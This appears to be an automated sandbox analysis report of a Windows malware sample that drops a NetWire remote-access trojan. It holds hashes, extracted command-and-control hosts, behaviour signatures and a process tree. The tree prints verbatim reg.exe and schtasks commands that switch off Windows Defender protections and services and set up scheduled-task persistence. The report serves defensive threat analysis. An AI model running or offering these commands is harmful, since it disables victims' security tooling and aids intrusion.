Analysis
-
max time kernel
131s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
20/04/2025, 01:09
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
-
Size
22.0MB
-
MD5
2a26ed689a49e2b3cfd71901147f8303
-
SHA1
d49d9e9e8b0e10a4429a64dde1a0974bc414c819
-
SHA256
00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
-
SHA512
9dfd5314841394af05efbd2d8d995bea3921f83971472168a7bd0c789c94f95932fb117052caa8641ac902e1d942503edccb5536463a7fd65e8bdcb17d62e294
-
SSDEEP
393216:XA/VQ0ppRcqLGEx1HEApai9u+5Snh5NQluiffTIS:XNYR8I2AblM5qgifUS
Malware Config
Extracted
netwire
maelus.mine.nu:3650
victoire.dyndns.biz:3650
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
first spread
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
0000
-
registry_autorun
false
-
use_mutex
false
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
NetWire RAT payload 6 IoCs
resource yara_rule behavioral1/memory/6108-292-0x0000000000400000-0x0000000000425000-memory.dmp netwire behavioral1/memory/3720-297-0x0000000000400000-0x0000000000425000-memory.dmp netwire behavioral1/memory/3720-295-0x0000000000400000-0x0000000000425000-memory.dmp netwire behavioral1/memory/4884-290-0x0000000000400000-0x0000000000425000-memory.dmp netwire behavioral1/memory/6108-288-0x0000000000400000-0x0000000000425000-memory.dmp netwire behavioral1/memory/4884-293-0x0000000000400000-0x0000000000425000-memory.dmp netwire -
Netwire family
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions YrtbHB5Gfq2BVO9.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions ROJid3crwtijBOi.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions ZeXD3PhMCqyv9oV.exe -
Looks for VMWare Tools registry key 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools YrtbHB5Gfq2BVO9.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools ROJid3crwtijBOi.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools ZeXD3PhMCqyv9oV.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZeXD3PhMCqyv9oV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ROJid3crwtijBOi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YrtbHB5Gfq2BVO9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YrtbHB5Gfq2BVO9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ROJid3crwtijBOi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZeXD3PhMCqyv9oV.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation ROJid3crwtijBOi.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation YrtbHB5Gfq2BVO9.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation ZeXD3PhMCqyv9oV.exe -
Executes dropped EXE 9 IoCs
pid Process 4004 WinDriversQt.exe 4336 ROJid3crwtijBOi.exe 1080 YrtbHB5Gfq2BVO9.exe 4508 ZeXD3PhMCqyv9oV.exe 4672 nb662-full.exe 6108 YrtbHB5Gfq2BVO9.exe 4884 ROJid3crwtijBOi.exe 4420 ZeXD3PhMCqyv9oV.exe 3720 ZeXD3PhMCqyv9oV.exe -
Loads dropped DLL 12 IoCs
pid Process 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe 4672 nb662-full.exe -
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 ZeXD3PhMCqyv9oV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum ROJid3crwtijBOi.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 ROJid3crwtijBOi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum YrtbHB5Gfq2BVO9.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 YrtbHB5Gfq2BVO9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum ZeXD3PhMCqyv9oV.exe -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1080 set thread context of 6108 1080 YrtbHB5Gfq2BVO9.exe 141 PID 4336 set thread context of 4884 4336 ROJid3crwtijBOi.exe 143 PID 4508 set thread context of 3720 4508 ZeXD3PhMCqyv9oV.exe 144 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ROJid3crwtijBOi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinDriversQt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nb662-full.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YrtbHB5Gfq2BVO9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZeXD3PhMCqyv9oV.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x00060000000227be-49.dat nsis_installer_1 behavioral1/files/0x00060000000227be-49.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nb662-full.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz nb662-full.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4692 schtasks.exe 3408 schtasks.exe 4792 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4508 ZeXD3PhMCqyv9oV.exe 4508 ZeXD3PhMCqyv9oV.exe 1080 YrtbHB5Gfq2BVO9.exe 4336 ROJid3crwtijBOi.exe 4508 ZeXD3PhMCqyv9oV.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4508 ZeXD3PhMCqyv9oV.exe Token: SeDebugPrivilege 1080 YrtbHB5Gfq2BVO9.exe Token: SeDebugPrivilege 4336 ROJid3crwtijBOi.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4004 WinDriversQt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2284 wrote to memory of 4004 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 87 PID 2284 wrote to memory of 4004 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 87 PID 2284 wrote to memory of 4004 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 87 PID 2284 wrote to memory of 4336 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 90 PID 2284 wrote to memory of 4336 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 90 PID 2284 wrote to memory of 4336 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 90 PID 2284 wrote to memory of 1080 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 91 PID 2284 wrote to memory of 1080 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 91 PID 2284 wrote to memory of 1080 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 91 PID 2284 wrote to memory of 4508 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 92 PID 2284 wrote to memory of 4508 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 92 PID 2284 wrote to memory of 4508 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 92 PID 4004 wrote to memory of 4684 4004 WinDriversQt.exe 94 PID 4004 wrote to memory of 4684 4004 WinDriversQt.exe 94 PID 2284 wrote to memory of 4672 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 93 PID 2284 wrote to memory of 4672 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 93 PID 2284 wrote to memory of 4672 2284 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe 93 PID 4684 wrote to memory of 4560 4684 cmd.exe 95 PID 4684 wrote to memory of 4560 4684 cmd.exe 95 PID 4684 wrote to memory of 4764 4684 cmd.exe 97 PID 4684 wrote to memory of 4764 4684 cmd.exe 97 PID 4684 wrote to memory of 1728 4684 cmd.exe 98 PID 4684 wrote to memory of 1728 4684 cmd.exe 98 PID 4684 wrote to memory of 3840 4684 cmd.exe 99 PID 4684 wrote to memory of 3840 4684 cmd.exe 99 PID 4684 wrote to memory of 1092 4684 cmd.exe 100 PID 4684 wrote to memory of 1092 4684 cmd.exe 100 PID 4684 wrote to memory of 6096 4684 cmd.exe 101 PID 4684 wrote to memory of 6096 4684 cmd.exe 101 PID 4684 wrote to memory of 5288 4684 cmd.exe 102 PID 4684 wrote to memory of 5288 4684 cmd.exe 102 PID 4684 wrote to memory of 4388 4684 cmd.exe 103 PID 4684 wrote to memory of 4388 4684 cmd.exe 103 PID 4684 wrote to memory of 6072 4684 cmd.exe 104 PID 4684 wrote to memory of 6072 4684 cmd.exe 104 PID 4684 wrote to memory of 536 4684 cmd.exe 105 PID 4684 wrote to memory of 536 4684 cmd.exe 105 PID 4684 wrote to memory of 1572 4684 cmd.exe 106 PID 4684 wrote to memory of 1572 4684 cmd.exe 106 PID 4684 wrote to memory of 1308 4684 cmd.exe 107 PID 4684 wrote to memory of 1308 4684 cmd.exe 107 PID 4684 wrote to memory of 4312 4684 cmd.exe 108 PID 4684 wrote to memory of 4312 4684 cmd.exe 108 PID 4684 wrote to memory of 5456 4684 cmd.exe 109 PID 4684 wrote to memory of 5456 4684 cmd.exe 109 PID 4684 wrote to memory of 1356 4684 cmd.exe 110 PID 4684 wrote to memory of 1356 4684 cmd.exe 110 PID 4684 wrote to memory of 5932 4684 cmd.exe 111 PID 4684 wrote to memory of 5932 4684 cmd.exe 111 PID 4684 wrote to memory of 4688 4684 cmd.exe 112 PID 4684 wrote to memory of 4688 4684 cmd.exe 112 PID 4684 wrote to memory of 5220 4684 cmd.exe 113 PID 4684 wrote to memory of 5220 4684 cmd.exe 113 PID 4684 wrote to memory of 728 4684 cmd.exe 114 PID 4684 wrote to memory of 728 4684 cmd.exe 114 PID 4684 wrote to memory of 3748 4684 cmd.exe 115 PID 4684 wrote to memory of 3748 4684 cmd.exe 115 PID 4684 wrote to memory of 944 4684 cmd.exe 116 PID 4684 wrote to memory of 944 4684 cmd.exe 116 PID 4684 wrote to memory of 3680 4684 cmd.exe 117 PID 4684 wrote to memory of 3680 4684 cmd.exe 117 PID 4684 wrote to memory of 5376 4684 cmd.exe 118 PID 4684 wrote to memory of 5376 4684 cmd.exe 118 PID 4684 wrote to memory of 3240 4684 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:4560
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4764
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1728
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:3840
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1092
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6096
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5288
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4388
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6072
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:536
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:1572
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:1308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:4312
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:5456
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:1356
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:5932
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:4688
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:5220
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:728
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:3748
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:944
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:3680
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:5376
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3240
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:2676
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:4880
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1192
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1496
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1648
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:2880
-
-
-
-
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3408
-
-
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"{path}"3⤵
- Executes dropped EXE
PID:4884
-
-
-
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4792
-
-
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"{path}"3⤵
- Executes dropped EXE
PID:6108
-
-
-
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4692
-
-
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"{path}"3⤵
- Executes dropped EXE
PID:4420
-
-
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"{path}"3⤵
- Executes dropped EXE
PID:3720
-
-
-
C:\Users\Admin\AppData\Roaming\nb662-full.exe"C:\Users\Admin\AppData\Roaming\nb662-full.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4672
-
Network
MITRE ATT&CK Enterprise v16
Persistence
Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
3Disable or Modify Tools
2Modify Registry
4Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5665f21a9b6730aa08e62473e481b8c55
SHA1717d52e75ac16bf032299828dd61c86af281eb43
SHA256dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e
-
Filesize
934B
MD520e22e58357bf5efd453f66090fabec3
SHA173c9b7e6ef3c3a5b03826f9e274df1a3a36c585d
SHA256677447273c583bde1d350dc29f10ac77e2067a6ddfca1eac51e088e969a35e85
SHA512d8d4558f17767e6821c3fd57c979ae42d710aacf3eb536b81962714fab6dd680e5d6cdd44a7f236e0f7a4cb5bd993c0c3dfa37ace1b44ebb176dbee2c510afb2
-
Filesize
14KB
MD52a03c4a7ac5ee5e0e0a683949f70971b
SHA13bd9877caaea4804c0400420494ad1143179dcec
SHA256d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b
SHA5121942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476
-
Filesize
5KB
MD5ebd0da54db9f12ffd15206cc24355793
SHA1910be3bebdde55eb1ce05915a79f01ebdc622786
SHA2564066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6
SHA512cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d
-
Filesize
11KB
MD56f5257c0b8c0ef4d440f4f4fce85fb1b
SHA1b6ac111dfb0d1fc75ad09c56bde7830232395785
SHA256b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1
SHA512a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8
-
Filesize
14KB
MD54814167aa1c7ec892e84907094646faa
SHA1a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee
SHA25632dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822
SHA512fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067
-
Filesize
4KB
MD58ef0e4eb7c89cdd2b552de746f5e2a53
SHA1820f681e7cec409a02b194a487d1c8af1038acf0
SHA25641293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5
-
Filesize
4KB
MD5d25102051b33f61c9f7fb564a4556219
SHA1c683964c11d5175171bd009cb08f87592c923f85
SHA256e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
